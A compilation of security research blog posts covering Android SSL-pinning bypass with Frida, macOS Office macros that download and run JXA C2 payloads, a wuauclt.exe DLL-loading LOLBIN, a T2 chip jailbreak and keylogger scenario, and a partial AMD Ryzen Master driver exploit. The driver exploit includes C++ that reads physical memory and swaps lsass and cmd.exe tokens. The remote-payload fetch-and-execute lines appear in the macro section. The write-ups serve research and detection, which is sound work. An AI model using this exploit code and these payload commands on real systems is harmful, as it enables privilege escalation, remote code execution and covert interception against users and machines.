Android Security Testing: Setting up burp suite with Android VM/physical device

Original text by Sarvesh Sharma

Setting up Burp Suite with an Android device is simple, but a little tricky.

There are two ways to set up this environment:
1. Setting up Burp Suite with an Android VM (needs Genymotion with VirtualBox).
2. Setting up Burp Suite with an Android physical device (needs a rooted Android device).

Setting up Burp Suite with an Android VM (Genymotion with VirtualBox) or with an Android physical device.

Follow the steps below.
Prerequisites:
i. Burp Suite.
ii. Genymotion (with VirtualBox)

or

ii. Android device (rooted).
iii. ADB tools (see the download instructions below).
iv. Setting up the proxy and certificate in the Android VM/device.
v. Frida installed on the host PC and the Frida server file to run Frida on the Android device (Python installed on the host machine, i.e. PC/laptop).

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listeners → click on Import / export CA certificate → under Export, choose Certificate in DER format (e.g. cacert.der) → click Next → select any file name with the .der extension → click Next.

[Image: Burp certificate export]

Step 2: Go to the folder where you saved the Burp CA certificate → change the extension from .der to .crt (e.g. cacert.crt) → and save it.

Step 3: Proxy setting in Burp: Go to Proxy → Options → Proxy Listeners → click Add → select Specific address and choose the IP of the machine where Burp is running, or simply select All interfaces (it will intercept all the traffic going through your system) → enable this listener.

[Image: Burp proxy setting]

ii. Genymotion (with VirtualBox).

Step 1: Installing Genymotion: Download Genymotion (please select the version with VirtualBox) from the Genymotion website → register with Genymotion → log in → click the Add icon to add a new virtual device → select the Android API level according to the Android version you need → select a device from the list → click Next. (Recommended device and settings are in the attached screenshots.)

[Image: Genymotion download]
[Image: VM device selection]
[Image: VM device settings]

Step 3: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on the Open GApps icon in the sidebar. Follow the steps and it will automatically download and install GApps on your VM device.

or

ii. Android Physical Device.

Note: We need an Android device running Android OS version 6.0 or newer. Along with this, we need to root the device (there are different ways to root a device; flashing Magisk is one of the popular and recommended ways to root an Android device).

Step 1: Just plug the Android device with a USB cable into the system where you want to capture the traffic.

iii. ADB tools:

You can download ADB tools from the Android developer site; it will redirect to a page where you can select the ADB (platform-tools) package according to your host machine. Select “SDK Platform-Tools for Windows/Mac/Linux”, accept the required terms, and download. Extract the tools to any location (you will need to navigate to this location in cmd/terminal whenever you want to use the ADB tools). ADB tools are useful for doing out-of-the-box stuff on Android, like installing an app on the device directly from your laptop/PC or pushing a file directly to any location. (We will see the use of ADB in the upcoming steps.)

To make ADB tools available globally on Windows: go to Start → search for “Edit the system environment variables” → open it → in the Advanced tab → Environment Variables → select and edit Path under System variables → click New → paste the path of the ADB tools directory (where you extracted the downloaded ADB tools zip).

iv. Setting up proxy and Certificate in Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device/Android VM from Genymotion (if it shows an IP-related error at boot, go to VirtualBox, start the device listed there, and power it off after it gets an IP) → go to Settings → Wi-Fi → long-press the Wi-Fi network listed there and select Modify Network → set Proxy to Manual → enter your host machine’s IP as the hostname and the port that was set as the proxy listener in the Burp proxy settings → Save.

[Image: Setting up the proxy in Android]

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push the Burp certificate to the Android device: There are two ways to add a certificate to the Android device.
i. Adding the certificate to the user certificate store (recommended): push the Burp certificate (with the .crt extension) using the command

"adb push path_to_certificate /sdcard/Download/"

Switch to the Android device → go to Settings → Security → Install from SD card → select the certificate from the Download folder → it will ask you to enter a name; enter any name here (e.g. Burp CA) → it will ask you to add PIN security → enter a security PIN → Next.

ii. Adding the certificate to the system certificate store: Download and install OpenSSL → open cmd and run the command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
It will print a hash value; copy it and save it for further use.
Then run
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem to <hash_value>.0.
Now copy the certificate to the device. Here is the list of commands to execute:
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding the Burp certificate to the system certificate store is that we don’t need to follow step v, which is the Frida setup. (But it’s not the recommended way because it sometimes misses some API calls.)
Reference: https://enderspub.kubertu.com/burp-suite-ssl-pinning

v. Frida installation on the host PC and running the Frida server on the Android device.

Step 1: Installing Frida on the host PC: run the command “pip install frida-tools” to install Frida on the host PC.

Step 2: Running the Frida server on the Android device:

  1. Run the command “adb shell getprop ro.product.cpu.abi” to find out the processor architecture. →
  2. Download the Frida server file from the Frida releases page. (Select the file according to the processor architecture: if it is ARM, take the arm file; if it is x86, take the x86 file.) →
  3. Extract the .xz file → copy the file from the extracted folder to the Android device via the command “adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/” →
  4. Now disable SELinux (this is a one-time process): “adb shell” → in the shell: “su” → “setenforce 0”.
  5. Start the Frida server with the command: “adb shell” → “/data/local/tmp/frida-server-12.x.y-android-xyz &”

Step 3: Creating a JS file to bypass SSL pinning: This is needed to fix certificate-related errors and capture traffic in Burp Suite.
Create a JS file named frida-ssl-pin.js, paste the following content into it, and save the file.

Java.perform(function() {

    var array_list = Java.use("java.util.ArrayList");
    var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');

    ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
        // console.log('Bypassing SSL Pinning');
        var k = array_list.$new();
        return k;
    }

}, 0);

Step 4: Running the Frida client from the host machine:

  1. Open the app on the Android device, then find the process name by running the command from cmd: “frida-ps -U”, and copy the process name.
  2. Run the Frida client with the command: “frida -U -l path_to_js_file/frida-ssl-pin.js --no-pause -f com.example.application”. This will open the app again, and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, we need to repeat the steps for running the Frida server on the Android device.
  2. In the case mentioned in point 1, we need to restart the Frida client on the host machine as well.

Please let me know in case of any query….

Running JXA Payloads from macOS Office Macros

Original text by Cedric Owens

Despite being quite antiquated, MS Office macros continue to be used by red teams (and attackers) due to the fact that they are easy to craft and they still work (and on the macOS side of the house, they often go undetected without building custom content). I have written MS Office macros for a couple of different macOS C2 tools in the past, and in both I used python as the means of running the C2 payload.

With the landscape starting to shift in the macOS arena to moving away from python-based offensive tooling, I thought I would take a look at how to write macros for macOS without using python. Below I walk through that process.

I tried a few things to see what would and would not execute in the macOS app sandbox (where anything spawned by an MS Office macro is executed). I found that several utilities I wanted to use were not able to execute in the sandbox (I tested the items below from VBA execution using MacScript (“do shell script ….”)):

  • I tried using osascript to launch a JXA javascript file: osascript -l JavaScript -e “eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘[url_to_jxa_js_file]’)),$.NSUTF8StringEncoding)));” — → osascript is permitted in the app sandbox, but not the -l JavaScript option during my testing
  • I tried building Objective C code on the fly, compiling, and executing via the command line: echo "#import <Foundation/Foundation.h>\n#import <AppKit/AppKit.h>\n#import <OSAKit/OSAKit.h>\n#include <pthread.h>\n#include <assert.h>\n\nint main(int argc, const char * argv[]) {\n\t@autoreleasepool {\n\t\tNSString *encString = @\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('[JXApayloadURL]')),$.NSUTF8StringEncoding)));\";\n\t\tOSALanguage *lang = [OSALanguage languageForName:@\"JavaScript\"];\n\t\tOSAScript *script = [[OSAScript alloc] initWithSource:encString language:lang];\n\t\tNSDictionary *__autoreleasing compileError;\n\t\tNSDictionary *__autoreleasing runError;\n\t\t[script compileAndReturnError:&compileError];\n\t\tNSAppleEventDescriptor* res = [script executeAndReturnError:&runError];\n\t\tBOOL didSucceed = (res != nil);\n\t}\n\treturn 0;\n}" >> jxa.m && clang -fmodules jxa.m -o jxa && ./jxa — → clang (as well as gcc) were not permitted to be executed in the sandbox during my testing
  • Next I went very simple and just tried to invoke curl to download a hosted JXA .js payload and to invoke that payload via osascript…THAT DID WORK:
[Image: JXA payload downloaded and run]
[Image: Mythic payload executed]

Note: There is nothing really advanced or complex in the code above. Since these command line binaries were allowed in the app Sandbox, this made for an easy way to perform this action without using python.

Here is my github repo with the macro generator code to produce VBA code with content similar to above:

https://github.com/cedowens/Mythic-Macro-Generator

In my testing I used Mythic’s apfell http JXA .js payloads:

https://github.com/its-a-feature/Mythic

What is neat about Mythic is even though this method will launch the Mythic agent inside of the app sandbox, Mythic is still able to execute some functions outside of the sandbox due to how it is invoking ObjC calls to perform those functions.

Detection

Since my macro generator produces code that relies on the command line, detections are pretty straightforward. I ran Patrick Wardle’s ProcessMonitor tool (which uses the Endpoint Security Framework) in order to capture events when I launched the macro and connected to Mythic. Here is a screenshot of the capture:

[Image: ProcessMonitor capture]

In summary, parent-child detections can be used to detect this macro:

  • Office Product (ex: Microsoft Word.app) → /bin/sh
  • Office Product (ex: Microsoft Word.app) → /bin/bash
  • Office Product (ex: Microsoft Word.app) → /usr/bin/curl

I recommend blue teams roll out the detections above, as there should be little to no valid activity stemming from the above parent-child relationships.

Code execution via the Windows Update client (wuauclt)

Original text by DTM

It’s been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I’ve been having a blast starting my new role in the MDSec ActiveBreach team.

Today I wanted to share something a little more juicy. Enter the ‘WSUS Useful Client’ as they describe here. The Windows Update client (wuauclt.exe) is a bit elusive, with only a small number of Microsoft articles about it [1] [2], and these articles do not seem to document all of the available command line options.

This binary lives here:

C:\Windows\System32\wuauclt.exe

I discovered (when I get a chance, I will share further details of the methodology I used to find this in a blog post @MDSecLabs) that you can gain code execution by specifying an arbitrary DLL with the following command line options on the test Windows 10 systems I tried:

wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer
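
To experiment with this safely, a minimal test DLL is enough. The sketch below is not from the original post; it simply drops a marker file from DllMain, so if the file appears after running the command above, the DLL was loaded and its code executed. The output path is arbitrary, and the DLL can be built with something like cl /LD.

#include <windows.h>

// Minimal test DLL: when a process loads this DLL, DllMain runs on
// DLL_PROCESS_ATTACH and drops a marker file, proving code execution.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
    {
        // Arbitrary, world-writable marker path used only to confirm execution.
        HANDLE hFile = CreateFileA("C:\\Users\\Public\\wuauclt_poc.txt",
                                   GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
                                   FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile != INVALID_HANDLE_VALUE)
            CloseHandle(hFile);
    }
    return TRUE;
}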

There’s some fantastic work already in the community for raising the awareness of LOLBINs and for sharing new candidates and their capabilities with the excellent LOLBAS project. I have made the following pull request to this project:

https://github.com/LOLBAS-Project/LOLBAS/pull/99

After discovering this LOLBIN independently, some brief searching highlighted a sample on Joe Sandbox leveraging it in the wild:

https://www.joesandbox.com/analysis/215088/0/html

Finally, come and hang out at the RedTeamSec Discord here. It’s been great to see this community grow over the past few months, with some great content being shared.

Plug’nPwn — Connect to Jailbreak

Original text by T2

State of the World: checkm8, checkra1n and the T2
For those just joining us, news broke last week about the jailbreaking of Apple’s T2 security processor in recent Macs. If you haven’t read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we’ve stated that you must put the computer into DFU before you can run checkra1n to jailbreak the T2, and that remains true; however, today we are introducing a demo of replacing a target Mac’s EFI and releasing details on the T2 debug interface.
A Monkey by any Other Name
In order to build their products, Apple, unlike app developers, has to debug the core operating system. This is how firmware, the kernel and the debugger itself are built and debugged. From the earliest days of the iPod, Apple has built specialized debug probes for building their products. These devices are leaked from Apple headquarters and their factories and have traditionally had monkey-related names such as the “Kong”, “Kanzi” and “Chimp”. They work by allowing access to special debug pins of the CPU (which for ARM devices is called Serial Wire Debug or SWD), as well as other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device, and access generally provides the ability to circumvent most security measures. Apple has even spoken about their debug capabilities in a BlackHat talk describing the security measures in effect. Apple has even deployed versions of these to their retail locations, allowing for repair of their iPads and Macs.
The Bonobo in the Myst
Another hardware hacker and security researcher, Ramtin Amin, did work last year to create an effective clone of the Kanzi cable. This, combined with the checkm8 vulnerability from axi0mX, allows iPhones 5s through X to be debugged.
The USB port on the Mac
One of the interesting questions is how the Mac shares a USB port between the Intel CPU (macOS) and the T2 (bridgeOS) for DFU.  These are essentially separate computers inside of the case sharing the same pins.  Schematics of the MacBook leaked from Apple’s vendors (a quick search with a part number and “schematic”), and analysis of the USB-C firmware update payload show that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) as well as terminating USB power delivery (USB-PD) for the charging of the MacBook or connected devices.  Further analysis shows that this port is shared between the following:

The Thunderbolt controller which allows the port to be used by macOS as Thunderbolt, USB3 or DisplayPort
The T2 USB host for DFU recovery
Various UART serial lines
The debug pins of the T2
The debug pins of the Intel CPU for debugging EFI and the kernel of macOS

Like the above documentation related to the iPhone, the debug lanes of a Mac are only available if enabled via the T2.  Prior to the checkm8 bug this required a specially signed payload from Apple, meaning that Apple has a skeleton key to debug any device including production machines.  Thanks to checkm8, any T2 can be demoted, and the debug functionality can be enabled.  Unfortunately Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that it has not been properly researched leading to a string of vulnerabilities over the years.
The USB-C Plug and USB-PD

Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer which device inside the Mac you’d like to connect to.  The USB-C port specification provides pins for this exact purpose (CC1/CC2), as well as for detecting the orientation of the cable, allowing it to be reversible.  On top of the CC pins runs another low-speed protocol called USB-PD or USB Power Delivery.  It is primarily used to negotiate power requirements between chargers (sources) and devices (sinks).  USB-PD also allows for arbitrary packets of information in what are called “Vendor Defined Messages” or VDMs.

Apple’s USB-PD Extensions
The VDM allows Apple to trigger actions and specify the target of a USB-C connection.  We have discovered USB-PD payloads that cause the T2 to be rebooted and for the T2 to be held in a DFU state.  Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction.  While we haven’t tested an Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the device’s ECID and Serial Number to be read from the T2’s DFU reliably.  The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode.
Apple needs to document the entire set of VDM messages used in their products so that consumers can understand the security risks.  The set of commands we issue is unauthenticated, and even if it were, the commands are undocumented and thus un-reviewed.  Apple could have prevented this scenario by requiring that some physical attestation occur during these VDMs, such as holding down the power button at the same time.

Putting it Together
Taking all this information into account, we can string it together to reflect a real world attack.  By creating a specialized device about the size of a power charger, we can place a T2 into DFU mode, run checkra1n, replace the EFI and upload a key logger to capture all keys.  This is possible even though macOS is un-altered (the logo at boot is for effect but need not be done).  This is because in Mac portables the keyboard is directly connected to the T2 and passed through to macOS.

VIDEO DEMO
PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if it doesn’t show, it may be your AdBlock: https://youtu.be/LRoTr0HQP1U)

PlugN’Pwn Automatic Jailbreak
In the next video we use checkra1n to modify the MacEFI payload for the Intel processor (again, AdBlock may cause it not to show https://youtu.be/uDSPlpEP-T0)

USB-C Debug Probe

In order to facilitate further research on the topic of USB-PD security, and to allow users at home to perform similar experiments, we are pleased to announce pre-ordering of our USB-PD Screamer.  It allows a computer to directly “speak” USB-PD to a target device.  Get more info here:

[PRE-SALE] USB-PD Screamer

$49.99

This miniature USB-to-Power Delivery adapter lets you experiment with the USB Power Delivery protocol and discover hidden functionality in various Type-C devices.

Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.

Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).

WARNING! This probe is NOT an SWD/Serial probe by itself. It only allows you to send needed PD packets to mux SWD/Serial out and exposes it on the test pads. If you want to use SWD/Serial, you WILL need another SWD/Serial probe/adapter upstream connected to the test pads.

ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.

Only for arbitrary PD messages.

Dimensions: 10x15mm (excluding type-c plug)

Connectivity: USB to control custom PD messages, test points for USB-Top, USB-Bottom, and SBU lines for connection to upstream devices to utilize the exposed functionality.

CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

Original text by h0mbre

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’ GitHub repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here.

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redundancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common for 3rd-party Windows drivers responsible for hardware configuration or diagnostics to make powerful routines that directly read from or write to physical memory available to low-privileged users.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the API was cross-referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except that the source and destination are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!
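
To make the shape of these calls concrete, here is a minimal sketch of driving the read primitive from user-land. It mirrors the READ_INPUT_BUFFER layout and the 0xc-byte metadata offset used in the full PoC at the end of this post; the device handle and IOCTL code come from that same code, error handling is omitted, and len is assumed to be at most one page.

#include <windows.h>
#include <string.h>

// Layout mirrored from the PoC below: physical address + length, followed
// by room for the data the driver hands back.
typedef struct {
    INT64 start_address;          // physical address to map with MmMapIoSpace
    DWORD num_of_bytes;           // number of bytes to read
    char  receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// Read len bytes of physical memory starting at phys into out. hDevice is a
// handle to \\.\AMDRyzenMasterDriverV15 and read_ioctl is the read IOCTL
// code defined in the full PoC.
BOOL read_physical(HANDLE hDevice, DWORD read_ioctl, INT64 phys,
                   PBYTE out, DWORD len)
{
    READ_INPUT_BUFFER in = { phys, len };
    BYTE raw[0x100c] = { 0 };     // 0xc bytes of metadata + one page of data
    DWORD ret = 0;

    if (!DeviceIoControl(hDevice, read_ioctl, &in, 0x40,
                         raw, sizeof(raw), &ret, NULL))
        return FALSE;

    // The copied bytes start at offset 0xc of the output buffer.
    memcpy(out, raw + 0xc, len);
    return TRUE;
}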

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4, that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the distance from my "Proc" tag, once found, to the beginning of the EPROCESS structure, where I know the offsets to the members I want, varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address, the literal place where "Proc" was, and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.page_entry_offset, and also annotate how far from "Proc" it was until we reached our marker, or the beginning of EPROCESS, in PROC_DATA.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses, as this is the most stable way to call the API.

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<———TOKEN——————————->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

